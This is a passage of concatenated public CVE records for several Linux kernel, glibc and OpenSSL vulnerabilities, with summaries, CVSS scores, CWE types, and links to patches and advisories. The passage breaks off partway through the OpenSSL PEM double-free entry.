"dateUpdated": "2024-09-16T22:24:42.723Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-3633
Vulnerability from cvelistv5
Published
2022-10-21 00:00
Modified
2024-08-03 01:14
Severity ?
3.5 (Low) - CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L
3.5 (Low) - CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L
3.5 (Low) - CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L
EPSS score ?
Summary
A vulnerability classified as problematic has been found in Linux Kernel. Affected is the function j1939_session_destroy of the file net/can/j1939/transport.c. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211932.
References
▼ | URL | Tags |
---|---|---|
https://vuldb.com/?id.211932 | vdb-entry, technical-description | |
https://vuldb.com/?ctiid.211932 | signature, permissions-required | |
https://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec-next.git/commit/?id=8c21c54a53ab21842f5050fa090f26b03c0313d6 | patch |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T01:14:03.231Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vdb-entry", "technical-description", "x_transferred" ], "url": "https://vuldb.com/?id.211932" }, { "tags": [ "signature", "permissions-required", "x_transferred" ], "url": "https://vuldb.com/?ctiid.211932" }, { "tags": [ "patch", "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec-next.git/commit/?id=8c21c54a53ab21842f5050fa090f26b03c0313d6" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "Linux", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "A vulnerability classified as problematic has been found in Linux Kernel. Affected is the function j1939_session_destroy of the file net/can/j1939/transport.c. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211932." }, { "lang": "de", "value": "Es wurde eine problematische Schwachstelle in Linux Kernel entdeckt. Es geht dabei um die Funktion j1939_session_destroy der Datei net/can/j1939/transport.c. Mittels Manipulieren mit unbekannten Daten kann eine memory leak-Schwachstelle ausgenutzt werden. Als bestm\u00f6gliche Massnahme wird Patching empfohlen." } ], "metrics": [ { "cvssV3_1": { "baseScore": 3.5, "baseSeverity": "LOW", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" } }, { "cvssV3_0": { "baseScore": 3.5, "baseSeverity": "LOW", "vectorString": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "version": "3.0" } }, { "cvssV2_0": { "baseScore": 2.7, "vectorString": "AV:A/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-401", "description": "CWE-401 Memory Leak", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-10-20T14:03:55.871Z", "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5", "shortName": "VulDB" }, "references": [ { "tags": [ "vdb-entry", "technical-description" ], "url": "https://vuldb.com/?id.211932" }, { "tags": [ "signature", "permissions-required" ], "url": "https://vuldb.com/?ctiid.211932" }, { "tags": [ "patch" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec-next.git/commit/?id=8c21c54a53ab21842f5050fa090f26b03c0313d6" } ], "timeline": [ { "lang": "en", "time": "2022-10-21T00:00:00.000Z", "value": "Advisory disclosed" }, { "lang": "en", "time": "2022-10-21T00:00:00.000Z", "value": "CVE reserved" }, { "lang": "en", "time": "2022-10-21T02:00:00.000Z", "value": "VulDB entry created" }, { "lang": "en", "time": "2023-01-03T12:45:09.000Z", "value": "VulDB entry last update" } ], "title": "Linux Kernel transport.c j1939_session_destroy memory leak" } }, "cveMetadata": { "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5", "assignerShortName": "VulDB", "cveId": "CVE-2022-3633", "datePublished": "2022-10-21T00:00:00", "dateReserved": "2022-10-21T00:00:00", "dateUpdated": "2024-08-03T01:14:03.231Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-1434
Vulnerability from cvelistv5
Published
2022-05-03 15:15
Modified
2024-09-17 04:19
Severity ?
EPSS score ?
Summary
The OpenSSL 3.0 implementation of the RC4-MD5 ciphersuite incorrectly uses the AAD data as the MAC key. This makes the MAC key trivially predictable. An attacker could exploit this issue by performing a man-in-the-middle attack to modify data being sent from one endpoint to an OpenSSL 3.0 recipient such that the modified data would still pass the MAC integrity check. Note that data sent from an OpenSSL 3.0 endpoint to a non-OpenSSL 3.0 endpoint will always be rejected by the recipient and the connection will fail at that point. Many application protocols require data to be sent from the client to the server first. Therefore, in such a case, only an OpenSSL 3.0 server would be impacted when talking to a non-OpenSSL 3.0 client. If both endpoints are OpenSSL 3.0 then the attacker could modify data being sent in both directions. In this case both clients and servers could be affected, regardless of the application protocol. Note that in the absence of an attacker this bug means that an OpenSSL 3.0 endpoint communicating with a non-OpenSSL 3.0 endpoint will fail to complete the handshake when using this ciphersuite. The confidentiality of data is not impacted by this issue, i.e. an attacker cannot decrypt data that has been encrypted using this ciphersuite - they can only modify it. In order for this attack to work both endpoints must legitimately negotiate the RC4-MD5 ciphersuite. This ciphersuite is not compiled by default in OpenSSL 3.0, and is not available within the default provider or the default ciphersuite list. This ciphersuite will never be used if TLSv1.3 has been negotiated. In order for an OpenSSL 3.0 endpoint to use this ciphersuite the following must have occurred: 1) OpenSSL must have been compiled with the (non-default) compile time option enable-weak-ssl-ciphers 2) OpenSSL must have had the legacy provider explicitly loaded (either through application code or via configuration) 3) The ciphersuite must have been explicitly added to the ciphersuite list 4) The libssl security level must have been set to 0 (default is 1) 5) A version of SSL/TLS below TLSv1.3 must have been negotiated 6) Both endpoints must negotiate the RC4-MD5 ciphersuite in preference to any others that both endpoints have in common Fixed in OpenSSL 3.0.3 (Affected 3.0.0,3.0.1,3.0.2).
References
Impacted products
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T00:03:06.246Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://www.openssl.org/news/secadv/20220503.txt" }, { "tags": [ "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=7d56a74a96828985db7354a55227a511615f732b" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20220602-0009/" }, { "tags": [ "x_transferred" ], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-953464.pdf" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "OpenSSL", "vendor": "OpenSSL", "versions": [ { "status": "affected", "version": "Fixed in OpenSSL 3.0.3 (Affected 3.0.0,3.0.1,3.0.2)" } ] } ], "credits": [ { "lang": "en", "value": "Tom Colley (Broadcom)" } ], "datePublic": "2022-05-03T00:00:00", "descriptions": [ { "lang": "en", "value": "The OpenSSL 3.0 implementation of the RC4-MD5 ciphersuite incorrectly uses the AAD data as the MAC key. This makes the MAC key trivially predictable. An attacker could exploit this issue by performing a man-in-the-middle attack to modify data being sent from one endpoint to an OpenSSL 3.0 recipient such that the modified data would still pass the MAC integrity check. Note that data sent from an OpenSSL 3.0 endpoint to a non-OpenSSL 3.0 endpoint will always be rejected by the recipient and the connection will fail at that point. Many application protocols require data to be sent from the client to the server first. Therefore, in such a case, only an OpenSSL 3.0 server would be impacted when talking to a non-OpenSSL 3.0 client. If both endpoints are OpenSSL 3.0 then the attacker could modify data being sent in both directions. In this case both clients and servers could be affected, regardless of the application protocol. Note that in the absence of an attacker this bug means that an OpenSSL 3.0 endpoint communicating with a non-OpenSSL 3.0 endpoint will fail to complete the handshake when using this ciphersuite. The confidentiality of data is not impacted by this issue, i.e. an attacker cannot decrypt data that has been encrypted using this ciphersuite - they can only modify it. In order for this attack to work both endpoints must legitimately negotiate the RC4-MD5 ciphersuite. This ciphersuite is not compiled by default in OpenSSL 3.0, and is not available within the default provider or the default ciphersuite list. This ciphersuite will never be used if TLSv1.3 has been negotiated. In order for an OpenSSL 3.0 endpoint to use this ciphersuite the following must have occurred: 1) OpenSSL must have been compiled with the (non-default) compile time option enable-weak-ssl-ciphers 2) OpenSSL must have had the legacy provider explicitly loaded (either through application code or via configuration) 3) The ciphersuite must have been explicitly added to the ciphersuite list 4) The libssl security level must have been set to 0 (default is 1) 5) A version of SSL/TLS below TLSv1.3 must have been negotiated 6) Both endpoints must negotiate the RC4-MD5 ciphersuite in preference to any others that both endpoints have in common Fixed in OpenSSL 3.0.3 (Affected 3.0.0,3.0.1,3.0.2)." } ], "metrics": [ { "other": { "content": { "lang": "eng", "url": "https://www.openssl.org/policies/secpolicy.html#Low", "value": "Low" }, "type": "unknown" } } ], "problemTypes": [ { "descriptions": [ { "description": "Incorrect MAC key", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2023-02-14T00:00:00", "orgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "shortName": "openssl" }, "references": [ { "url": "https://www.openssl.org/news/secadv/20220503.txt" }, { "url": "https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=7d56a74a96828985db7354a55227a511615f732b" }, { "url": "https://security.netapp.com/advisory/ntap-20220602-0009/" }, { "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-953464.pdf" } ], "title": "Incorrect MAC key used in the RC4-MD5 ciphersuite" } }, "cveMetadata": { "assignerOrgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "assignerShortName": "openssl", "cveId": "CVE-2022-1434", "datePublished": "2022-05-03T15:15:23.387791Z", "dateReserved": "2022-04-22T00:00:00", "dateUpdated": "2024-09-17T04:19:38.052Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-2327
Vulnerability from cvelistv5
Published
2022-07-22 00:00
Modified
2024-08-03 00:32
Severity ?
EPSS score ?
Summary
io_uring use work_flags to determine which identity need to grab from the calling process to make sure it is consistent with the calling process when executing IORING_OP. Some operations are missing some types, which can lead to incorrect reference counts which can then lead to a double free. We recommend upgrading the kernel past commit df3f3bb5059d20ef094d6b2f0256c4bf4127a859
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | Linux Kernel | Linux Kernel |
Version: unspecified < df3f3bb5059d20ef094d6b2f0256c4bf4127a859 |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T00:32:09.619Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?h=linux-5.10.y\u0026id=df3f3bb5059d20ef094d6b2f0256c4bf4127a859" }, { "tags": [ "x_transferred" ], "url": "https://kernel.dance/#df3f3bb5059d20ef094d6b2f0256c4bf4127a859" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230203-0009/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Linux Kernel", "vendor": "Linux Kernel", "versions": [ { "lessThan": "df3f3bb5059d20ef094d6b2f0256c4bf4127a859", "status": "affected", "version": "unspecified", "versionType": "custom" } ] } ], "descriptions": [ { "lang": "en", "value": "io_uring use work_flags to determine which identity need to grab from the calling process to make sure it is consistent with the calling process when executing IORING_OP. Some operations are missing some types, which can lead to incorrect reference counts which can then lead to a double free. We recommend upgrading the kernel past commit df3f3bb5059d20ef094d6b2f0256c4bf4127a859" } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416 Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-02-03T00:00:00", "orgId": "14ed7db2-1595-443d-9d34-6215bf890778", "shortName": "Google" }, "references": [ { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?h=linux-5.10.y\u0026id=df3f3bb5059d20ef094d6b2f0256c4bf4127a859" }, { "url": "https://kernel.dance/#df3f3bb5059d20ef094d6b2f0256c4bf4127a859" }, { "url": "https://security.netapp.com/advisory/ntap-20230203-0009/" } ], "source": { "discovery": "EXTERNAL" }, "title": "Use-after-free in io_uring ad work_flags in Linux Kernel", "x_generator": { "engine": "Vulnogram 0.0.9" } } }, "cveMetadata": { "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778", "assignerShortName": "Google", "cveId": "CVE-2022-2327", "datePublished": "2022-07-22T00:00:00", "dateReserved": "2022-07-06T00:00:00", "dateUpdated": "2024-08-03T00:32:09.619Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-35942
Vulnerability from cvelistv5
Published
2021-07-22 00:00
Modified
2024-08-04 00:40
Severity ?
EPSS score ?
Summary
The wordexp function in the GNU C Library (aka glibc) through 2.33 may crash or read arbitrary memory in parse_param (in posix/wordexp.c) when called with an untrusted, crafted pattern, potentially resulting in a denial of service or disclosure of information. This occurs because atoi was used but strtoul should have been used to ensure correct calculations.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T00:40:47.554Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://sourceware.org/glibc/wiki/Security%20Exceptions" }, { "tags": [ "x_transferred" ], "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=28011" }, { "tags": [ "x_transferred" ], "url": "https://sourceware.org/git/?p=glibc.git%3Ba=commit%3Bh=5adda61f62b77384718b4c0d8336ade8f2b4b35c" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20210827-0005/" }, { "name": "GLSA-202208-24", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://security.gentoo.org/glsa/202208-24" }, { "name": "[debian-lts-announce] 20221017 [SECURITY] [DLA 3152-1] glibc security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "The wordexp function in the GNU C Library (aka glibc) through 2.33 may crash or read arbitrary memory in parse_param (in posix/wordexp.c) when called with an untrusted, crafted pattern, potentially resulting in a denial of service or disclosure of information. This occurs because atoi was used but strtoul should have been used to ensure correct calculations." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-10-17T00:00:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://sourceware.org/glibc/wiki/Security%20Exceptions" }, { "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=28011" }, { "url": "https://sourceware.org/git/?p=glibc.git%3Ba=commit%3Bh=5adda61f62b77384718b4c0d8336ade8f2b4b35c" }, { "url": "https://security.netapp.com/advisory/ntap-20210827-0005/" }, { "name": "GLSA-202208-24", "tags": [ "vendor-advisory" ], "url": "https://security.gentoo.org/glsa/202208-24" }, { "name": "[debian-lts-announce] 20221017 [SECURITY] [DLA 3152-1] glibc security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2021-35942", "datePublished": "2021-07-22T00:00:00", "dateReserved": "2021-06-29T00:00:00", "dateUpdated": "2024-08-04T00:40:47.554Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-2905
Vulnerability from cvelistv5
Published
2022-09-09 00:00
Modified
2024-08-03 00:53
Severity ?
EPSS score ?
Summary
An out-of-bounds memory read flaw was found in the Linux kernel's BPF subsystem in how a user calls the bpf_tail_call function with a key larger than the max_entries of the map. This flaw allows a local user to gain unauthorized access to data.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T00:53:00.453Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2121800" }, { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/bpf/984b37f9fdf7ac36831d2137415a4a915744c1b6.1661462653.git.daniel%40iogearbox.net/" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Linux kernel 6.0-rc4" } ] } ], "descriptions": [ { "lang": "en", "value": "An out-of-bounds memory read flaw was found in the Linux kernel\u0027s BPF subsystem in how a user calls the bpf_tail_call function with a key larger than the max_entries of the map. This flaw allows a local user to gain unauthorized access to data." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-125", "description": "CWE-125", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-11-01T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2121800" }, { "url": "https://lore.kernel.org/bpf/984b37f9fdf7ac36831d2137415a4a915744c1b6.1661462653.git.daniel%40iogearbox.net/" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2022-2905", "datePublished": "2022-09-09T00:00:00", "dateReserved": "2022-08-19T00:00:00", "dateUpdated": "2024-08-03T00:53:00.453Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-41850
Vulnerability from cvelistv5
Published
2022-09-30 00:00
Modified
2024-08-03 12:56
Severity ?
EPSS score ?
Summary
roccat_report_event in drivers/hid/hid-roccat.c in the Linux kernel through 5.19.12 has a race condition and resultant use-after-free in certain situations where a report is received while copying a report->value is in progress.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T12:56:38.133Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/all/20220904193115.GA28134%40ubuntu/t/#u" }, { "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html" }, { "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=cacdb14b1c8d3804a3a7d31773bc7569837b71a4" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "roccat_report_event in drivers/hid/hid-roccat.c in the Linux kernel through 5.19.12 has a race condition and resultant use-after-free in certain situations where a report is received while copying a report-\u003evalue is in progress." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2024-03-25T00:40:37.282942", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://lore.kernel.org/all/20220904193115.GA28134%40ubuntu/t/#u" }, { "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html" }, { "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html" }, { "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=cacdb14b1c8d3804a3a7d31773bc7569837b71a4" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2022-41850", "datePublished": "2022-09-30T00:00:00", "dateReserved": "2022-09-30T00:00:00", "dateUpdated": "2024-08-03T12:56:38.133Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-2602
Vulnerability from cvelistv5
Published
2024-01-08 17:56
Modified
2024-08-03 00:46
Severity ?
EPSS score ?
Summary
io_uring UAF, Unix SCM garbage collection
References
▼ | URL | Tags |
---|---|---|
https://ubuntu.com/security/notices/USN-5692-1 | third-party-advisory | |
https://ubuntu.com/security/notices/USN-5752-1 | third-party-advisory | |
https://ubuntu.com/security/notices/USN-5693-1 | third-party-advisory | |
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2602 | issue-tracking | |
https://ubuntu.com/security/notices/USN-5691-1 | third-party-advisory | |
https://ubuntu.com/security/notices/USN-5700-1 | third-party-advisory | |
http://packetstormsecurity.com/files/176533/Linux-Broken-Unix-GC-Interaction-Use-After-Free.html |
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | The Linux Kernel Organization | linux |
Version: 0 ≤ |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T00:46:03.143Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "third-party-advisory", "x_transferred" ], "url": "https://ubuntu.com/security/notices/USN-5692-1" }, { "tags": [ "third-party-advisory", "x_transferred" ], "url": "https://ubuntu.com/security/notices/USN-5752-1" }, { "tags": [ "third-party-advisory", "x_transferred" ], "url": "https://ubuntu.com/security/notices/USN-5693-1" }, { "tags": [ "issue-tracking", "x_transferred" ], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2602" }, { "tags": [ "third-party-advisory", "x_transferred" ], "url": "https://ubuntu.com/security/notices/USN-5691-1" }, { "tags": [ "third-party-advisory", "x_transferred" ], "url": "https://ubuntu.com/security/notices/USN-5700-1" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/176533/Linux-Broken-Unix-GC-Interaction-Use-After-Free.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "packageName": "linux", "platforms": [ "Linux" ], "product": "linux", "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git", "vendor": "The Linux Kernel Organization", "versions": [ { "lessThan": "6.1~rc1", "status": "affected", "version": "0", "versionType": "semver" } ] } ], "credits": [ { "lang": "en", "type": "finder", "value": "David Bouman" }, { "lang": "en", "type": "finder", "value": "Billy Jheng Bing Jhong working with Trend Micro\u0027s Zero Day Initiative" } ], "descriptions": [ { "lang": "en", "value": "io_uring UAF, Unix SCM garbage collection" } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-01-08T17:56:16.403Z", "orgId": "cc1ad9ee-3454-478d-9317-d3e869d708bc", "shortName": "canonical" }, "references": [ { "tags": [ "third-party-advisory" ], "url": "https://ubuntu.com/security/notices/USN-5692-1" }, { "tags": [ "third-party-advisory" ], "url": "https://ubuntu.com/security/notices/USN-5752-1" }, { "tags": [ "third-party-advisory" ], "url": "https://ubuntu.com/security/notices/USN-5693-1" }, { "tags": [ "issue-tracking" ], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2602" }, { "tags": [ "third-party-advisory" ], "url": "https://ubuntu.com/security/notices/USN-5691-1" }, { "tags": [ "third-party-advisory" ], "url": "https://ubuntu.com/security/notices/USN-5700-1" }, { "url": "http://packetstormsecurity.com/files/176533/Linux-Broken-Unix-GC-Interaction-Use-After-Free.html" } ] } }, "cveMetadata": { "assignerOrgId": "cc1ad9ee-3454-478d-9317-d3e869d708bc", "assignerShortName": "canonical", "cveId": "CVE-2022-2602", "datePublished": "2024-01-08T17:56:16.403Z", "dateReserved": "2022-08-01T19:49:01.609Z", "dateUpdated": "2024-08-03T00:46:03.143Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-4450
Vulnerability from cvelistv5
Published
2023-02-08 19:04
Modified
2024-08-03 01:41
Severity ?
EPSS score ?
Summary
The function PEM_read_bio_ex() reads a PEM file from a BIO and parses and
decodes the "name" (e.g. "CERTIFICATE"), any header data and the payload data.
If the function succeeds then the "name_out", "header" and "data" arguments are
populated with pointers to buffers containing the relevant decoded data. The
caller is responsible for freeing those buffers. It is possible to construct a
PEM file that results in 0 bytes of payload data. In this case PEM_read_bio_ex()
will return a failure code but will populate the header argument with a pointer
to a buffer that has already been freed. If the caller also frees this buffer
then a double free will occur. This will most likely lead to a crash. This
could be exploited by an attacker who has the ability to supply malicious PEM
files for parsing to achieve a denial of service attack.
The functions PEM_read_bio() and PEM_read() are simple wrappers around
PEM_read_bio_ex() and therefore these functions are also directly affected.
These functions are also called indirectly by a number of other OpenSSL
functions including PEM_X509_INFO_read_bio_ex() and
SSL_CTX_use_serverinfo_file() which are also vulnerable. Some OpenSSL internal
uses of these functions are not vulnerable because the caller does not free the
header argument if PEM_read_bio_ex() returns a failure code. These locations
include the PEM_read_bio_TYPE() functions as well as the decoders introduced in
OpenSSL 3.0.
The OpenSSL asn1parse command line application is also impacted by this issue.
References
Impacted products
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T01:41:44.632Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "OpenSSL Advisory", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.openssl.org/news/secadv/20230207.txt" }, { "name": "3.0.8 git commit", "tags": [ "patch", "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83" }, { "name": "1.1.1t git commit", "tags": [ "patch", "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b" }, { "tags": [ "x_transferred" ], "url": "https://security.gentoo.org/glsa/202402-08" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "OpenSSL", "vendor": "OpenSSL", "versions": [ { "lessThan": "3.0.8", "status": "affected", "version": "3.0.0", "versionType": "semver" }, { "lessThan": "1.1.1t", "status": "affected", "version": "1.1.1", "versionType": "custom" } ] } ], "credits": [ { "lang": "en", "type": "finder", "user": "00000000-0000-4000-9000-000000000000", "value": "CarpetFuzz" }, { "lang": "en", "type": "reporter", "user": "00000000-0000-4000-9000-000000000000", "value": "Dawei Wang" }, { "lang": "en", "type": "reporter", "user": "00000000-0000-4000-9000-000000000000", "value": "Marc Sch\u00f6nefeld" }, { "lang": "en", "type": "remediation developer", "user": "00000000-0000-4000-9000-000000000000", "value": "Kurt Roeckx" }, { "lang": "en", "type": "remediation developer", "user": "00000000-0000-4000-9000-000000000000", "value": "Matt Caswell" } ], "datePublic": "2023-02-07T00:00:00.000Z", "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "The function PEM_read_bio_ex() reads a PEM file from a BIO and parses and\u003cbr\u003edecodes the \"name\" (e.g. \"CERTIFICATE\"), any header data and the payload data.\u003cbr\u003eIf the function succeeds then the \"name_out\", \"header\" and \"data\" arguments are\u003cbr\u003epopulated with pointers to buffers containing the relevant decoded data. The\u003cbr\u003ecaller is responsible for freeing those buffers. It is possible to construct a\u003cbr\u003ePEM file that results in 0 bytes of payload data. In this case PEM_read_bio_ex()\u003cbr\u003ewill return a failure code but will populate the header argument with a pointer\u003cbr\u003eto a buffer that has already been freed. If the caller also frees this buffer\u003cbr\u003ethen a double free will occur. This will most likely lead to a crash. This\u003cbr\u003ecould be exploited by an attacker who 